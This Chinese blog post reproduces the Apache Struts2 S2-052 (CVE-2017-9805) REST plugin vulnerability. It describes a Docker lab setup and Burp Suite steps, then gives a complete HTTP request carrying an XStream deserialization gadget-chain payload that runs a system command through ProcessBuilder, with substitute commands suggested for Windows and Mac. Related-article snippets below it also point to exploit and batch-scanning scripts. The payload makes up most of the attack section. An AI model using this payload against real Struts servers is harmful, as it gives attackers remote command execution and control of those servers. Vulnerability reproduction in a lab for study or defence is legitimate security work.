S2-052(CVE-2017-9805)

最新推荐文章于 2022-04-20 11:19:26 发布
最新推荐文章于 2022-04-20 11:19:26 发布
阅读量1.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现分析 文章标签: struts2.0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cwtv123/article/details/77948530
本文介绍S2-052(CVE-2017-9805)远程代码执行漏洞的POC利用方法,适用于Struts2.1.2至Struts2.3.33及Struts2.5至Struts2.5.12版本。文章提供了测试环境搭建步骤,并展示了如何通过构造特定的XML请求来触发漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

S2-052(CVE-2017-9805)

struts2 052远程代码执行漏洞POC利用(影响版本:Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) 官方介绍:https://cwiki.apache.org/confluence/display/WW/S2-052 此POC是在struts-2.5.12版本测试验证的。

测试环境搭建

├── docker-compose.yml
├── Dockerfile
├── poc.txt
├── README.md
└── S2-052.war

docker-compose build
docker-compose up -d

Dockerfile

FROM kk98kk0/tomcat:9.0

MAINTAINER phithon <root@leavesongs.com>(借鉴leavesongs.comDocker配置)

RUN set -ex \
    && rm -rf /usr/local/tomcat/webapps/* \
    && chmod a+x /usr/local/tomcat/bin/*.sh

COPY S2-052.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080

docker-compose.yml 

version: '2'
services:
 struts2:
   build: .
   ports:
    - "8080:8080"

POC

http://10.160.11.191:8080/orders.xhtml

burpsuite抓包:
进入到修改界面,点击”提交”抓包,然后修改Content-Type为application/xml格式,post数据替换为poc中data提交。
Notes:
Windows下关键字为:

calc
Mac下关键字为:

/Applications/Calculator.app/Contents/MacOS/Calculator

POC

POST /orders/3 HTTP/1.1
Host: 10.160.11.191:8080
Proxy-Connection: keep-alive
Content-Length: 2014
Cache-Control: max-age=0
Origin: http://10.160.11.191:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://10.160.11.191:8080/orders/3/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _gitlab_session=de4e739c66f5b892f6386a2d2689486b; JSESSIONID=10830E7168FBEAE80396A8E748587042

<map> 
    <entry> 
        <jdk.nashorn.internal.objects.NativeString>
            <flags>0</flags>
            <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
                <dataHandler>
                    <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                        <is class="javax.crypto.CipherInputStream">
                            <cipher class="javax.crypto.NullCipher">
                                <initialized>false</initialized>
                                <opmode>0</opmode>
                                <serviceIterator class="javax.imageio.spi.FilterIterator">
                                    <iter class="javax.imageio.spi.FilterIterator">
                                        <iter class="java.util.Collections$EmptyIterator"/>
                                        <next class="java.lang.ProcessBuilder">
                                            <command>
                                                <string>ls</string>
                                            </command>
                                            <redirectErrorStream>false</redirectErrorStream>
                                        </next>
                                    </iter>
                                    <filter class="javax.imageio.ImageIO$ContainsFilter">
                                        <method>
                                            <class>java.lang.ProcessBuilder</class>
                                            <name>start</name>
                                            <parameter-types/>
                                        </method>
                                        <name>foo</name>
                                    </filter>
                                    <next class="string">foo</next>
                                </serviceIterator>
                                <lock/>
                            </cipher>
                            <input class="java.lang.ProcessBuilder$NullInputStream"/>
                            <ibuffer></ibuffer>
                            <done>false</done>
                            <ostart>0</ostart>
                            <ofinish>0</ofinish>
                            <closed>false</closed>
                        </is>
                        <consumed>false</consumed>
                    </dataSource>
                    <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
            </value>
        </jdk.nashorn.internal.objects.NativeString>
        <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
    </entry>
    <entry>
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
    </entry>
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805
qq_51577576的博客
12-15 1899
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
struts2-CVE-2017-9805
m0_51369969的博客
07-14 255
REST plugin是Struts2的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。...
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
weixin_33736649的博客
09-06 403
. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 二. 漏洞基本信息...
【vulhub】structs2远程代码执行漏洞 CVE-2017-9805(S2-052
weixin_42884199的博客
12-06 639
前言 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5
s2-052漏洞复现利用 CVE-2017-9805
w7deer的博客
04-20 1207
S2-052CVE-2017-9805)环境: VulApps/s/struts2/s2-052 at master · Medicean/VulApps · GitHub 访问 http://你的 IP 地址:端口号/ 漏洞poc检测与利用 poc下载: https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805 检测到漏洞存在: python apache-struts-pwn.py -u 'http://192.1.
CVE-2017-9805Struts2 漏洞复现与分析)
热门推荐
4ct10n
09-07 1万+
前天发布的新漏洞,以前Struts的漏洞也是经常出,今年三月份就有一次。但这类的洞一直没有跟进,今天也是想着把它给复现一下,同时搭个环境分析一下漏洞形成的原因。0x01 漏洞简介漏洞背景 2017年9月5日,Apache官方发布了一则公告,该公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞,CVE编号为CVE-2017-9805Struts2 REST插件的XStre
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行...
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson-databind 漏洞 CVE-2017-7525、...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个...
【漏洞复现】S2-052 (CVE-2017-9805)
weixin_30526593的博客
11-20 316
一、漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行。 二、受影响版本 Struts2.5 – Struts2.5.12版本 Struts2.3.33版本 三、漏洞POC POST /struts2-rest-sho...
S2-052的POC测试
黑面狐
09-06 5842
今天朋友圈全被S2-052刷屏了。看了好些大牛分析,虽然原理不是特别明白。但是想尝试去复现一把。 一、环境搭建: 需要TOMCAT / JDK /struts-2.5.12安装包 / burpsuite  tomcat和jdk我就跳过了。 struts-2.5.12安装包的下载地址:http://archive.apache.org/dist/struts/2.5.12/struts-2.
struts2-052-CVE-2017-9805
weixin_43718688的博客
03-15 292
访问 http://ip:8080/ 即可,能看到如下面这个图,就说明可以了。 点edit,然后点submit抓包 在数据包里构造POC: <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unm
Apache Struts2(S2-052)远程代码执行漏洞利用和修复建议
蚁景网安学院
09-06 3805
点击“合天智汇”关注,学习网安干货话说哥们正吃着火锅唱着歌呢~~突然瞥见微信群的信息“Struts2 S2-052 RCE。。。。”赶紧放下筷子瞅一眼,这Struts2真是不让人省心啊,...
S2-052 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 1840
调试环境搭建 使用官方的rest-sample即可,下载2.5.12版本的源码https://github.com/apache/struts/archive/STRUTS_2_5_12.zip,然后将apps下面的rest-showcase源码脱下来。 Eclipse中新建一个maven工程,web.xml,pom.xml和struts.xml如下: pom.xml &lt;!-- s...
【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
weixin_34342207的博客
09-06 192
2017年9月5日,Struts官方发布一个严重级别的安全漏洞,该漏洞编号为:S2-052,在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 漏洞影响范围: Struts 2.5-Struts 2.5.12 漏洞解决方案: 为了确保您在阿里云上的业务安全、可靠的运行,阿里云安全团队友情提示您尽快...
S2-052 漏洞复现
weixin_41082546的博客
10-06 1197
Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-052CVE-2017-9805)环境: https://gi...
Struts2 新漏洞(S2-052)出现利用实例,面对漏洞企业应当分秒必争
weixin_33895016的博客
11-02 235
9月5日,千疮百孔的 Struts2 应用又曝出存在新的高危远程代码执行漏洞(S2-052)。该漏洞由 lgtm.com 的安全研究员汇报,编号为 CVE-2017-9805 ,漏洞危害程度为高危(Critical)。其实,相似的漏洞已经在 Struts 中多次发现,今年早些时候攻击者还利用了 Windows 服务器中的 Apache Strut...
S2-052
weixin_30354675的博客
05-05 551
前言 S2-052的RCE漏洞和以前的有些不同,不再是ognl表达式注入了,而是xml反序列化漏洞导致的RCE(另外还有S2-055漏洞是fastjson的反序列化漏洞)。我复现的时候遇到一个坑,导致一直复现不成功,就是必须要jdk1.8以上的版本才行。 正文 之前讲过执行action之前会先经过一些内置的拦截器,使用rest插件之后也是类似的,只不过经过的拦截器有变化了...
根据以下内容,帮我生成思维导图:Struts2框架漏洞触发路径分类 ├─ **一、OGNL表达式注入漏洞** │ ├─ 1. 请求参数直接注入 │ │ ├─ 案例:S2-001、S2-016 │ │ └─ 原理:参数值未经过滤直接解析为OGNL │ ├─ 2. HTTP请求头注入 │ │ ├─ 案例:S2-045(CVE-2017-5638) │ │ └─ 原理:Content-Type头被解析为表达式 │ ├─ 3. URL路径与命名空间注入 │ │ ├─ 案例:S2-057(CVE-2018-11776) │ │ └─ 原理:URL路径拼接至OGNL上下文 │ └─ 4. 模板引擎二次解析 │ ├─ 案例:S2-053(CVE-2017-12611) │ └─ 原理:Freemarker二次解析逃逸 │ ├─ **二、文件上传漏洞** │ ├─ 1. 恶意文件名/内容类型注入 │ │ ├─ 案例:S2-045、S2-046 │ │ └─ 原理:异常处理时解析表达式 │ └─ 2. 文件解析逻辑缺陷 │ ├─ 案例:S2-122 │ └─ 原理:元数据拼接至OGNL上下文 │ ├─ **三、组件依赖漏洞** │ ├─ 1. 反序列化漏洞 │ │ ├─ 案例:S2-052CVE-2017-9805) │ │ └─ 原理:XStream未限制反序列化类型 │ ├─ 2. 模板引擎集成缺陷 │ │ ├─ 案例:S2-053(CVE-2017-12611) │ │ └─ 原理:模板引擎强制解析输入 │ └─ 3. 插件功能滥用 │ ├─ 案例:S2-029 │ └─ 原理:Velocity标签属性注入 │ └─ **四、修复与防护建议** ├─ 1. OGNL防护:过滤特殊字符、禁用动态方法调用 ├─ 2. 文件上传修复:替换解析器、限制文件类型 └─ 3. 组件规避:移除冗余插件、配置反序列化白名单
最新发布
03-28
│ │ ├─ **案例**:S2-052CVE-2017-9805) │ │ └─ **原理**:XStream组件未限制反序列化对象类型 │ │ │ ├─ 2. 模板引擎集成缺陷 │ │ ├─ **案例**:S2-053(CVE-2017-12611) │ │ └─ **原理**...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值